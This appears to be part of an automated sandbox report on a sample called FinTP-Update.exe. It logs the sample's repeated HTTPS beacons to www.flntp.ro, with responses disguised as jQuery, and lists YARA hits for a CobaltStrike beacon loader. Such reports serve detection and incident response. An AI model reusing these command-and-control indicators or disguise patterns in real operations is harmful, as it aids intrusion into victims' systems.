                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:13:56 UTC235INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:13:55 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5713
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:13:56 UTC5713INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            46192.168.2.5499713.79.209.764431276C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-19 22:13:57 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:13:58 UTC235INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:13:58 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5692
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:13:58 UTC5692INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            47192.168.2.5499773.79.209.764431276C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-19 22:13:59 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:14:00 UTC235INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:14:00 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5713
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:14:00 UTC5713INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            48192.168.2.5499833.79.209.764431276C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-19 22:14:02 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:14:02 UTC235INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:14:02 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5649
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:14:02 UTC5649INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            49192.168.2.5499893.79.209.764431276C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-19 22:14:04 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:14:05 UTC235INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:14:04 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5607
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:14:05 UTC5607INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            50192.168.2.5499953.79.209.764431276C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-19 22:14:06 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:14:07 UTC235INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:14:07 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5671
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:14:07 UTC5671INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            51192.168.2.5500013.79.209.764431276C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-19 22:14:08 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:14:09 UTC235INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:14:09 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5607
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:14:09 UTC5607INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            52192.168.2.5500073.79.209.764431276C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-19 22:14:10 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:14:11 UTC235INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:14:11 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5607
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:14:11 UTC5607INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Statistics

                                                                                                                            CPU Usage

                                                                                                                            Click to jump to process

                                                                                                                            Memory Usage

                                                                                                                            Click to jump to process

                                                                                                                            High Level Behavior Distribution

                                                                                                                            Click to dive into process behavior distribution

                                                                                                                            Behavior

                                                                                                                            Click to jump to process

                                                                                                                            System Behavior

                                                                                                                            General

                                                                                                                            Target ID:0
                                                                                                                            Start time:17:12:07
                                                                                                                            Start date:19/12/2024
                                                                                                                            Path:C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:"C:\Users\user\Desktop\FinTP-Update.exe"
                                                                                                                            Imagebase:0x7ff7193c0000
                                                                                                                            File size:18'432 bytes
                                                                                                                            MD5 hash:4038D28C25E96E0E4045B3BC1093F497
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2425134169.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2425134169.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2425134169.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2425134169.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2313200724.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2313200724.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2313200724.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2313200724.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2313315862.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2313315862.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2313315862.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2313315862.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2651300690.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2651300690.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2651300690.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2651300690.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2764950621.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2764950621.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2764950621.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2764950621.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2491328068.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2491328068.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2491328068.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2491328068.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2491486119.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2491486119.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2491486119.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
